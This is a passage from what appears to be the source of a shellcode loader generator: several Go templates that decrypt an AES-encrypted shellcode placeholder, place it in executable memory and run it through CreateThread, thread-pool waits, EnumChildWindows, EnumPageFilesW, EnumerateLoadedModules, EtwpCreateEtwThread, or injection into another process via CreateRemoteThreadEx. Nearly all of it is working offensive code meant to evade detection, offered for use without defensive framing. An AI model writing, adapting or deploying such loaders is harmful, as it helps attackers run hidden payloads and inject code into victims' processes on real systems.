"golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | 25 | OpenProcess = kernel32.NewProc("OpenProcess") 26 | VirtualAllocEx = kernel32.NewProc("VirtualAllocEx") 27 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 28 | WriteProcessMemory = kernel32.NewProc("WriteProcessMemory") 29 | CreateRemoteThreadEx = kernel32.NewProc("CreateRemoteThreadEx") 30 | CloseHandle = kernel32.NewProc("CloseHandle") 31 | ) 32 | 33 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 34 | func Decrypt(key []byte, encryptedText string) string { 35 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 36 | 37 | block, err := aes.NewCipher(key) 38 | if err != nil { 39 | panic(err) 40 | } 41 | 42 | // Using IV 43 | iv := ciphertext[:aes.BlockSize] 44 | 45 | // Checking BlockSize = IV 46 | if len(iv) != aes.BlockSize { 47 | panic("[Error] Ciphertext is too short!") 48 | } 49 | 50 | ciphertext = ciphertext[aes.BlockSize:] 51 | 52 | // Decryption Process 53 | stream := cipher.NewCFBDecrypter(block, iv) 54 | stream.XORKeyStream(ciphertext, ciphertext) 55 | 56 | return string(ciphertext) 57 | } 58 | 59 | func Execute(shellcode []byte, pid int) { 60 | pHandle, _, errOpenProcess := OpenProcess.Call( 61 | windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, 62 | 0, 63 | uintptr(uint32(pid)), 64 | ) 65 | if errOpenProcess != nil && errOpenProcess.Error() != "The operation completed successfully." { 66 | panic("[ERROR] Call to OpenProcess failed!") 67 | } 68 | 69 | addr, _, errVirtualAlloc := VirtualAllocEx.Call( 70 | pHandle, 71 | 0, 72 | uintptr(len(shellcode)), 73 | windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE, 74 | ) 75 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 76 | panic("[ERROR] Call to VirtualAllocEx failed!") 77 | } 78 | 79 | _, _, errWriteProcessMemory := WriteProcessMemory.Call( 80 | pHandle, 81 | addr, 82 | (uintptr)(unsafe.Pointer(&shellcode[0])), 83 | uintptr(len(shellcode)), 84 | ) 85 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 86 | panic("[ERROR] Call to WriteProcessMemory failed!") 87 | } 88 | 89 | oldProtect := windows.PAGE_READWRITE 90 | _, _, errVirtualProtectEx := VirtualProtectEx.Call( 91 | pHandle, 92 | addr, 93 | uintptr(len(shellcode)), 94 | windows.PAGE_EXECUTE_READ, 95 | uintptr(unsafe.Pointer(&oldProtect)), 96 | ) 97 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 98 | panic("[ERROR] Call to WriteProcessMemory failed!") 99 | } 100 | 101 | _, _, errCreateRemoteThreadEx := CreateRemoteThreadEx.Call( 102 | pHandle, 103 | 0, 104 | 0, 105 | addr, 106 | 0, 107 | 0, 108 | 0, 109 | ) 110 | if errCreateRemoteThreadEx != nil && errCreateRemoteThreadEx.Error() != "The operation completed successfully." { 111 | panic("[ERROR] Call to CreateRemoteThreadEx failed!") 112 | } 113 | 114 | _, _, errCloseHandle := CloseHandle.Call( 115 | uintptr(uint32(pHandle)), 116 | ) 117 | if errCloseHandle != nil && errCloseHandle.Error() != "The operation completed successfully." { 118 | panic("[ERROR] Call to CloseHandle failed!") 119 | } 120 | } 121 | 122 | func main() { 123 | encShellcode := "{{.Shellcode}}" 124 | key := []byte("{{.Key}}") 125 | pid := {{.Pid}} 126 | 127 | // Decrypt base64/AES to original value 128 | decShellcode := Decrypt(key, encShellcode) 129 | 130 | shellcode, err := hex.DecodeString(decShellcode) 131 | 132 | if err != nil { 133 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 134 | os.Exit(1) 135 | } 136 | 137 | Execute(shellcode, pid) 138 | } 139 | -------------------------------------------------------------------------------- /templates/win64_CreateThread.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 27 | CreateThread = kernel32.NewProc("CreateThread") 28 | ) 29 | 30 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 31 | func Decrypt(key []byte, encryptedText string) string { 32 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 33 | 34 | block, err := aes.NewCipher(key) 35 | if err != nil { 36 | panic(err) 37 | } 38 | 39 | // Using IV 40 | iv := ciphertext[:aes.BlockSize] 41 | 42 | // Checking BlockSize = IV 43 | if len(iv) != aes.BlockSize { 44 | panic("[Error] Ciphertext is too short!") 45 | } 46 | 47 | ciphertext = ciphertext[aes.BlockSize:] 48 | 49 | // Decryption Process 50 | stream := cipher.NewCFBDecrypter(block, iv) 51 | stream.XORKeyStream(ciphertext, ciphertext) 52 | 53 | return string(ciphertext) 54 | } 55 | 56 | func Execute(shellcode []byte) { 57 | addr, errVirtualAlloc := windows.VirtualAlloc( 58 | uintptr(0), 59 | uintptr(len(shellcode)), 60 | windows.MEM_COMMIT|windows.MEM_RESERVE, 61 | windows.PAGE_READWRITE, 62 | ) 63 | if errVirtualAlloc != nil { 64 | panic("[ERROR] Call to VirtualAlloc failed!") 65 | } 66 | 67 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 68 | addr, 69 | (uintptr)(unsafe.Pointer(&shellcode[0])), 70 | uintptr(len(shellcode)), 71 | ) 72 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 73 | panic("[ERROR] Call to RtlCopyMemory failed!") 74 | } 75 | 76 | var oldProtect uint32 77 | errVirtualProtect := windows.VirtualProtect( 78 | addr, uintptr(len(shellcode)), 79 | windows.PAGE_EXECUTE_READ, 80 | &oldProtect, 81 | ) 82 | if errVirtualProtect != nil { 83 | panic("[ERROR] Call to VirtualProtect failed!") 84 | } 85 | 86 | thread, _, errCreateThread := CreateThread.Call( 87 | 0, 88 | 0, 89 | addr, 90 | uintptr(0), 91 | 0, 92 | 0, 93 | ) 94 | if errCreateThread != nil && errCreateThread.Error() != "The operation completed successfully." { 95 | panic("[ERROR] Call to CreateThread failed!") 96 | } 97 | 98 | _, _ = windows.WaitForSingleObject( 99 | windows.Handle(thread), 100 | 0xFFFFFFFF, 101 | ) 102 | } 103 | 104 | func main() { 105 | encShellcode := "{{.Shellcode}}" 106 | key := []byte("{{.Key}}") 107 | 108 | // Decrypt base64/AES to original value 109 | decShellcode := Decrypt(key, encShellcode) 110 | 111 | shellcode, err := hex.DecodeString(decShellcode) 112 | 113 | if err != nil { 114 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 115 | os.Exit(1) 116 | } 117 | 118 | Execute(shellcode) 119 | } -------------------------------------------------------------------------------- /templates/win64_CreateThreadNative.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | VirtualProtect = kernel32.NewProc("VirtualProtect") 28 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 29 | CreateThread = kernel32.NewProc("CreateThread") 30 | WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") 31 | ) 32 | 33 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 34 | func Decrypt(key []byte, encryptedText string) string { 35 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 36 | 37 | block, err := aes.NewCipher(key) 38 | if err != nil { 39 | panic(err) 40 | } 41 | 42 | // Using IV 43 | iv := ciphertext[:aes.BlockSize] 44 | 45 | // Checking BlockSize = IV 46 | if len(iv) != aes.BlockSize { 47 | panic("[Error] Ciphertext is too short!") 48 | } 49 | 50 | ciphertext = ciphertext[aes.BlockSize:] 51 | 52 | // Decryption Process 53 | stream := cipher.NewCFBDecrypter(block, iv) 54 | stream.XORKeyStream(ciphertext, ciphertext) 55 | 56 | return string(ciphertext) 57 | } 58 | 59 | func Execute(shellcode []byte) { 60 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 61 | 0, 62 | uintptr(len(shellcode)), 63 | MEM_COMMIT|MEM_RESERVE, 64 | PAGE_READWRITE, 65 | ) 66 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 67 | panic("[ERROR] Call to VirtualAlloc failed!") 68 | } 69 | 70 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 71 | addr, 72 | (uintptr)(unsafe.Pointer(&shellcode[0])), 73 | uintptr(len(shellcode)), 74 | ) 75 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 76 | panic("[ERROR] Call to RtlCopyMemory failed!") 77 | } 78 | 79 | oldProtect := PAGE_READWRITE 80 | 81 | _, _, errVirtualProtect := VirtualProtect.Call( 82 | addr, 83 | uintptr(len(shellcode)), 84 | PAGE_EXECUTE_READ, 85 | uintptr(unsafe.Pointer(&oldProtect)), 86 | ) 87 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 88 | panic("[ERROR] Call to VirtualProtect failed!") 89 | } 90 | 91 | thread, _, errCreateThread := CreateThread.Call( 92 | 0, 93 | 0, 94 | addr, 95 | uintptr(0), 96 | 0, 97 | 0, 98 | ) 99 | if errCreateThread != nil && errCreateThread.Error() != "The operation completed successfully." { 100 | panic("[ERROR] Call to CreateThread failed!") 101 | } 102 | 103 | _, _, errWaitForSingleObject := WaitForSingleObject.Call( 104 | thread, 105 | 0xFFFFFFFF, 106 | ) 107 | if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." { 108 | panic("[ERROR] Call to WaitForSingleObject failed!") 109 | } 110 | } 111 | 112 | func main() { 113 | encShellcode := "{{.Shellcode}}" 114 | key := []byte("{{.Key}}") 115 | 116 | // Decrypt base64/AES to original value 117 | decShellcode := Decrypt(key, encShellcode) 118 | 119 | shellcode, err := hex.DecodeString(decShellcode) 120 | 121 | if err != nil { 122 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 123 | os.Exit(1) 124 | } 125 | 126 | Execute(shellcode) 127 | } -------------------------------------------------------------------------------- /templates/win64_CreateThreadpoolWait.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | VirtualProtect = kernel32.NewProc("VirtualProtect") 28 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 29 | CreateThreadPoolWait = kernel32.NewProc("CreateThreadpoolWait") 30 | SetThreadPoolWait = kernel32.NewProc("SetThreadpoolWait") 31 | WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") 32 | ) 33 | 34 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 35 | func Decrypt(key []byte, encryptedText string) string { 36 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 37 | 38 | block, err := aes.NewCipher(key) 39 | if err != nil { 40 | panic(err) 41 | } 42 | 43 | iv := ciphertext[:aes.BlockSize] 44 | if len(iv) != aes.BlockSize { 45 | panic("[Error] Ciphertext is too short!") 46 | } 47 | 48 | ciphertext = ciphertext[aes.BlockSize:] 49 | stream := cipher.NewCFBDecrypter(block, iv) 50 | stream.XORKeyStream(ciphertext, ciphertext) 51 | 52 | return string(ciphertext) 53 | } 54 | 55 | func Execute(shellcode []byte) { 56 | event, err := windows.CreateEvent( 57 | nil, 58 | 0, 59 | 1, 60 | nil, 61 | ) 62 | if err != nil { 63 | return 64 | } 65 | 66 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 67 | 0, 68 | uintptr(len(shellcode)), 69 | MEM_COMMIT|MEM_RESERVE, 70 | PAGE_READWRITE, 71 | ) 72 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 73 | panic("[ERROR] Call to VirtualAlloc failed!") 74 | } 75 | 76 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 77 | addr, 78 | (uintptr)(unsafe.Pointer(&shellcode[0])), 79 | uintptr(len(shellcode)), 80 | ) 81 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 82 | panic("[ERROR] Call to RtlCopyMemory failed!") 83 | } 84 | 85 | oldProtect := PAGE_READWRITE 86 | _, _, errVirtualProtect := VirtualProtect.Call( 87 | addr, 88 | uintptr(len(shellcode)), 89 | PAGE_EXECUTE_READ, 90 | uintptr(unsafe.Pointer(&oldProtect)), 91 | ) 92 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 93 | panic("[ERROR] Call to VirtualProtect failed!") 94 | } 95 | 96 | pool, _, errpool := CreateThreadPoolWait.Call( 97 | addr, 98 | 0, 99 | 0, 100 | ) 101 | if errpool != nil && errpool.Error() != "The operation completed successfully." { 102 | panic("[ERROR] Call to CreateThreadPoolWait failed!") 103 | } 104 | 105 | _, _, errpoolwait := SetThreadPoolWait.Call( 106 | pool, 107 | uintptr(event), 108 | 0, 109 | ) 110 | if errpoolwait != nil && errpoolwait.Error() != "The operation completed successfully." { 111 | panic("[ERROR] Call to SetThreadPoolWait failed!") 112 | } 113 | 114 | _, _, errWaitForSingleObject := WaitForSingleObject.Call( 115 | uintptr(event), 116 | 0xFFFFFFFF, 117 | ) 118 | if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." { 119 | panic("[ERROR] Call to WaitForSingleObject failed!") 120 | } 121 | } 122 | 123 | func main() { 124 | encShellcode := "{{.Shellcode}}" 125 | key := []byte("{{.Key}}") 126 | 127 | // Decrypt base64/AES to original value 128 | decShellcode := Decrypt(key, encShellcode) 129 | 130 | shellcode, err := hex.DecodeString(decShellcode) 131 | 132 | if err != nil { 133 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 134 | os.Exit(1) 135 | } 136 | 137 | Execute(shellcode) 138 | } -------------------------------------------------------------------------------- /templates/win64_EnumChildWindows.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "github.com/lxn/win" 13 | "golang.org/x/sys/windows" 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READ = 0x20 20 | PAGE_READWRITE = 0x04 21 | ) 22 | 23 | var ( 24 | kernel32 = windows.NewLazySystemDLL("kernel32") 25 | 26 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory") 27 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 28 | VirtualProtect = kernel32.NewProc("VirtualProtect") 29 | ) 30 | 31 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 32 | func Decrypt(key []byte, encryptedText string) string { 33 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 34 | 35 | block, err := aes.NewCipher(key) 36 | if err != nil { 37 | panic(err) 38 | } 39 | 40 | iv := ciphertext[:aes.BlockSize] 41 | if len(iv) != aes.BlockSize { 42 | panic("[Error] Ciphertext is too short!") 43 | } 44 | 45 | ciphertext = ciphertext[aes.BlockSize:] 46 | stream := cipher.NewCFBDecrypter(block, iv) 47 | stream.XORKeyStream(ciphertext, ciphertext) 48 | 49 | return string(ciphertext) 50 | } 51 | 52 | func Execute(shellcode []byte) { 53 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 54 | 0, 55 | uintptr(len(shellcode)), 56 | MEM_COMMIT|MEM_RESERVE, 57 | PAGE_READWRITE, 58 | ) 59 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 60 | panic("[ERROR] Call to VirtualAlloc failed!") 61 | } 62 | 63 | _, _, errRtlMoveMemory := RtlMoveMemory.Call( 64 | addr, 65 | (uintptr)(unsafe.Pointer(&shellcode[0])), 66 | uintptr(len(shellcode)), 67 | ) 68 | if errRtlMoveMemory != nil && errRtlMoveMemory.Error() != "The operation completed successfully." { 69 | panic("[ERROR] Call to RtlMoveMemory failed!") 70 | } 71 | 72 | oldProtect := PAGE_READWRITE 73 | _, _, errVirtualProtect := VirtualProtect.Call( 74 | addr, 75 | uintptr(len(shellcode)), 76 | PAGE_EXECUTE_READ, 77 | uintptr(unsafe.Pointer(&oldProtect)), 78 | ) 79 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 80 | panic("[ERROR] Call to VirtualProtect failed!") 81 | } 82 | 83 | win.EnumChildWindows( 84 | 0, 85 | addr, 86 | 0, 87 | ) 88 | } 89 | 90 | func main() { 91 | encShellcode := "{{.Shellcode}}" 92 | key := []byte("{{.Key}}") 93 | 94 | // Decrypt base64/AES to original value 95 | decShellcode := Decrypt(key, encShellcode) 96 | 97 | shellcode, err := hex.DecodeString(decShellcode) 98 | 99 | if err != nil { 100 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 101 | os.Exit(1) 102 | } 103 | 104 | Execute(shellcode) 105 | } -------------------------------------------------------------------------------- /templates/win64_EnumPageFilesW.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32") 24 | psapi = windows.NewLazySystemDLL("psapi.dll") 25 | EnumPageFilesW = psapi.NewProc("EnumPageFilesW") 26 | 27 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory") 28 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 29 | VirtualProtect = kernel32.NewProc("VirtualProtect") 30 | ) 31 | 32 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 33 | func Decrypt(key []byte, encryptedText string) string { 34 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 35 | 36 | block, err := aes.NewCipher(key) 37 | if err != nil { 38 | panic(err) 39 | } 40 | 41 | // Using IV 42 | iv := ciphertext[:aes.BlockSize] 43 | 44 | // Checking BlockSize = IV 45 | if len(iv) != aes.BlockSize { 46 | panic("[Error] Ciphertext is too short!") 47 | } 48 | 49 | ciphertext = ciphertext[aes.BlockSize:] 50 | 51 | // Decryption Process 52 | stream := cipher.NewCFBDecrypter(block, iv) 53 | stream.XORKeyStream(ciphertext, ciphertext) 54 | 55 | return string(ciphertext) 56 | } 57 | 58 | func Execute(shellcode []byte) { 59 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 60 | 0, 61 | uintptr(len(shellcode)), 62 | MEM_COMMIT|MEM_RESERVE, 63 | PAGE_READWRITE, 64 | ) 65 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 66 | panic("[ERROR] Call to VirtualAlloc failed!") 67 | } 68 | _, _, errRtlMoveMemory := RtlMoveMemory.Call( 69 | addr, 70 | (uintptr)(unsafe.Pointer(&shellcode[0])), 71 | uintptr(len(shellcode)), 72 | ) 73 | if errRtlMoveMemory != nil && errRtlMoveMemory.Error() != "The operation completed successfully." { 74 | panic("[ERROR] Call to RtlMoveMemory failed!") 75 | } 76 | 77 | oldProtect := PAGE_READWRITE 78 | _, _, errVirtualProtect := VirtualProtect.Call( 79 | addr, 80 | uintptr(len(shellcode)), 81 | PAGE_EXECUTE_READ, 82 | uintptr(unsafe.Pointer(&oldProtect)), 83 | ) 84 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 85 | panic("[ERROR] Call to VirtualProtect failed!") 86 | } 87 | 88 | EnumPageFilesW.Call( 89 | addr, 90 | 0, 91 | ) 92 | } 93 | 94 | func main() { 95 | encShellcode := "{{.Shellcode}}" 96 | key := []byte("{{.Key}}") 97 | 98 | // Decrypt base64/AES to original value 99 | decShellcode := Decrypt(key, encShellcode) 100 | 101 | shellcode, err := hex.DecodeString(decShellcode) 102 | 103 | if err != nil { 104 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 105 | os.Exit(1) 106 | } 107 | 108 | Execute(shellcode) 109 | } 110 | -------------------------------------------------------------------------------- /templates/win64_EnumerateLoadedModules.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "syscall" 11 | "unsafe" 12 | 13 | "golang.org/x/sys/windows" 14 | ) 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READ = 0x20 20 | PAGE_READWRITE = 0x04 21 | ) 22 | 23 | var ( 24 | dbghelp = syscall.NewLazyDLL("dbghelp.dll") 25 | kernel32 = windows.NewLazySystemDLL("kernel32") 26 | 27 | enumerateLoadedModules = dbghelp.NewProc("EnumerateLoadedModules") 28 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory") 29 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 30 | VirtualProtect = kernel32.NewProc("VirtualProtect") 31 | ) 32 | 33 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 34 | func Decrypt(key []byte, encryptedText string) string { 35 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 36 | 37 | block, err := aes.NewCipher(key) 38 | if err != nil { 39 | panic(err) 40 | } 41 | 42 | // Using IV 43 | iv := ciphertext[:aes.BlockSize] 44 | 45 | // Checking BlockSize = IV 46 | if len(iv) != aes.BlockSize { 47 | panic("[Error] Ciphertext is too short!") 48 | } 49 | 50 | ciphertext = ciphertext[aes.BlockSize:] 51 | 52 | // Decryption Process 53 | stream := cipher.NewCFBDecrypter(block, iv) 54 | stream.XORKeyStream(ciphertext, ciphertext) 55 | 56 | return string(ciphertext) 57 | } 58 | 59 | func Execute(shellcode []byte) { 60 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 61 | 0, 62 | uintptr(len(shellcode)), 63 | MEM_COMMIT|MEM_RESERVE, 64 | PAGE_READWRITE, 65 | ) 66 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 67 | panic("[ERROR] Call to VirtualAlloc failed!") 68 | } 69 | 70 | _, _, errRtlMoveMemory := RtlMoveMemory.Call( 71 | addr, 72 | (uintptr)(unsafe.Pointer(&shellcode[0])), 73 | uintptr(len(shellcode)), 74 | ) 75 | if errRtlMoveMemory != nil && errRtlMoveMemory.Error() != "The operation completed successfully." { 76 | panic("[ERROR] Call to RtlMoveMemory failed!") 77 | } 78 | 79 | oldProtect := PAGE_READWRITE 80 | _, _, errVirtualProtect := VirtualProtect.Call( 81 | addr, 82 | uintptr(len(shellcode)), 83 | PAGE_EXECUTE_READ, 84 | uintptr(unsafe.Pointer(&oldProtect)), 85 | ) 86 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 87 | panic("[ERROR] Call to VirtualProtect failed!") 88 | } 89 | 90 | //Calling GetCurrentProcess to get a handle 91 | handle, _ := syscall.GetCurrentProcess() 92 | _, _, errenum := enumerateLoadedModules.Call( 93 | uintptr(handle), 94 | addr, 0, 95 | ) 96 | if errenum != nil && errenum.Error() != "The operation completed successfully." { 97 | panic("[ERROR] Call to enumerateLoadedModules failed!") 98 | } 99 | } 100 | 101 | func main() { 102 | encShellcode := "{{.Shellcode}}" 103 | key := []byte("{{.Key}}") 104 | 105 | // Decrypt base64/AES to original value 106 | decShellcode := Decrypt(key, encShellcode) 107 | 108 | shellcode, err := hex.DecodeString(decShellcode) 109 | 110 | if err != nil { 111 | fmt.Printf("[ERROR] Error Decoding: %s\n", err) 112 | os.Exit(1) 113 | } 114 | 115 | Execute(shellcode) 116 | } -------------------------------------------------------------------------------- /templates/win64_EtwpCreateEtwThread.tmpl: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "encoding/hex" 8 | "fmt" 9 | "os" 10 | "unsafe" 11 | 12 | "golang.org/x/sys/windows" 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READ = 0x20 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | var ( 23 | kernel32 = windows.NewLazySystemDLL("kernel32.dll") 24 | ntdll = windows.NewLazySystemDLL("ntdll.dll") 25 | 26 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 27 | VirtualProtect = kernel32.NewProc("VirtualProtect") 28 | RtlCopyMemory = ntdll.NewProc("RtlCopyMemory") 29 | EtwpCreateEtwThread = ntdll.NewProc("EtwpCreateEtwThread") 30 | WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") 31 | ) 32 | 33 | // Decrypt: Encrypted Text --> Base64 Decode --> Decrypt with IV and Key 34 | func Decrypt(key []byte, encryptedText string) string { 35 | ciphertext, _ := base64.URLEncoding.DecodeString(encryptedText) 36 | 37 | block, err := aes.NewCipher(key) 38 | if err != nil { 39 | panic(err) 40 | } 41 | 42 | // Using IV 43 | iv := ciphertext[:aes.BlockSize] 44 | 45 | // Checking BlockSize = IV 46 | if len(iv) != aes.BlockSize { 47 | panic("[Error] Ciphertext is too short!") 48 | } 49 | 50 | ciphertext = ciphertext[aes.BlockSize:] 51 | 52 | // Decryption Process 53 | stream := cipher.NewCFBDecrypter(block, iv) 54 | stream.XORKeyStream(ciphertext, ciphertext) 55 | 56 | return string(ciphertext) 57 | } 58 | 59 | func Execute(shellcode []byte) { 60 | addr, _, errVirtualAlloc := VirtualAlloc.Call( 61 | 0, 62 | uintptr(len(shellcode)), 63 | MEM_COMMIT|MEM_RESERVE, 64 | PAGE_READWRITE, 65 | ) 66 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 67 | panic("[ERROR] Call to VirtualAlloc failed!") 68 | } 69 | 70 | _, _, errRtlCopyMemory := RtlCopyMemory.Call( 71 | addr, 72 | (uintptr)(unsafe.Pointer(&shellcode[0])), 73 | uintptr(len(shellcode)), 74 | ) 75 | if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." { 76 | panic("[ERROR] Call to RtlCopyMemory failed!") 77 | } 78 | 79 | oldProtect := PAGE_READWRITE 80 | _, _, errVirtualProtect := VirtualProtect.Call( 81 | addr, 82 | uintptr(len(shellcode)), 83 | PAGE_EXECUTE_READ, 84 | uintptr(unsafe.Pointer(&oldProtect)), 85 | ) 86 | if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." { 87 | panic("[ERROR] Call to VirtualProtect failed!") 88 | } 89 | 90 | thread, _, errEtwThread := EtwpCreateEtwThread.Call( 91 | addr, 92 | uintptr(0), 93 | ) 94 | if errEtwThread != nil && errEtwThread.Error() != "The operation completed successfully." { 95 | panic("[ERROR] Call to EtwpCreateEtwThread failed!") 96 | } 97 | 98 | _, _, errWaitForSingleObject := WaitForSingleObject.Call( 99 | thread, 100 | 0xFFFFFFFF, 101 | ) 102 | if errWaitForSingleObject != nil && errWaitForSingleObject.Error() != "The operation completed successfully." { 103 | panic("[ERROR] Call to WaitForSingleObject failed!") 104 | } 105 | } 106 | 107 | func main() { 108 | encShellcode := "{{.Shellcode}}" 109 | key := []byte("{{.Key}}") 110 | 111 | // Decrypt base64/AES to original value 112 | decShellcode := Decrypt(key, encShellcode) 113 | 114 | shellcode, err := 